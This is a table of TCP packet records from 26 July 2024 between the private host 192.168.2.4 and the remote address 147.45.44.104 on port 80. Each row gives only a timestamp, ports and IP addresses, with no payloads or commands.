Jul 26, 2024 18:56:47.275563955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275578976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275605917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275623083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275691986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275703907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275715113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275727034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275736094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275738955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275748968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275758982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275763988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275772095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.275780916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275795937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.275820971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.276621103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276635885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276668072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276669025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.276680946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276691914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276702881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276702881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.276715994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276726007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.276736021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.276758909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.277977943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.277995110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278004885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278017044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278027058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278028965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.278038979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278043985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.278050900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278062105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278078079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.278100014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.278361082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.278403997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.355756998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.355842113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.355911016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.355911016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.355976105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.355988979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356019020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356050968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356311083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356322050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356334925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356348038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356349945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356383085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356383085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356905937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356918097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356929064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356940985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356954098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.356955051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.356981993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.357012033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.357625961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357639074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357650995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357664108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357670069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.357670069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357681990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.357686043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.357728958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.357758045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.358525038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358542919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358553886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358563900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358577013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358577013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.358591080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.358596087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.358635902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.358655930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.359369993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359385014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359396935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359407902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359419107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359431028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359431982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.359443903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.359456062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.359486103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.360311985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360327005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360337019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360347033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360358000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360363960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360363960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.360374928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.360400915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.360430956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.361315966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361330986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361340046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361350060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361360073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361370087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.361371994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.361412048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.362169027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362183094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362193108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362199068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362201929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.362210989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362211943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.362222910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362232924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.362252951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.362277031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.363140106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363152981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363162994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363174915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363184929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363190889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.363198042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363207102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363210917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.363218069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.363229990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.363276005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.364073038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364085913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364094973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364108086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364116907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364120960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.364129066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364140987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.364145994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.364165068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.364177942 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.365044117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365056992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365065098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365075111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365083933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365094900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365097046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.365106106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365134001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.365155935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.365956068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365972042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365982056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.365992069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366002083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366008043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366012096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.366018057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366025925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.366066933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.366892099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366904974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366914034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366924047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366935968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366939068 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.366945982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366957903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.366976976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.367006063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.367788076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.367800951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.367810965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.367829084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.367844105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.367887020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.368320942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368334055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368344069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368354082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368366003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368375063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.368382931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368391037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.368396997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.368432999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.368447065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.369272947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369286060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369296074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369306087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369316101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369327068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369328976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.369338989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.369362116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.369389057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.370099068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.370112896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.370127916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.370141983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.370141983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.370152950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.370172024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.370198965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.534053087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534065008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534074068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534084082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534116983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.534158945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.534357071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534367085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534383059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534394026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534399033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.534406900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534418106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534427881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.534429073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.534483910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.535355091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535365105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535373926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535383940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535391092 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.535394907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535406113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535413027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.535418987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.535440922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.535459042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.536439896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536451101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536461115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536468029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536472082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536475897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536478043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.536493063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536504984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536515951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.536535025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.536571026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.538276911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538289070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538300037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538310051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538319111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538327932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538328886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.538338900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538348913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.538358927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.538383007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.543628931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543659925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543668985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543680906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543690920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543699980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543709040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.543709993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.543732882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.543746948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544243097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544253111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544261932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544274092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544284105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544287920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544290066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544296026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544300079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544301987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544312000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544343948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544365883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544888973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544898987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544909000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544919014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544928074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544938087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544939041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544948101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544959068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544961929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.544969082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.544995070 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.545008898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548099041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548110962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548125029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548135042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548144102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548154116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548156023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548163891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548173904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548181057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548185110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548191071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548197031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548203945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548222065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548249960 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548273087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548283100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548291922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548300982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548310995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548314095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548316002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548321962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548338890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548341990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548353910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548361063 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548367023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548374891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.548378944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548391104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548401117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.548403025 CEST	49757	80	192.168.2.4	147.45.44.104
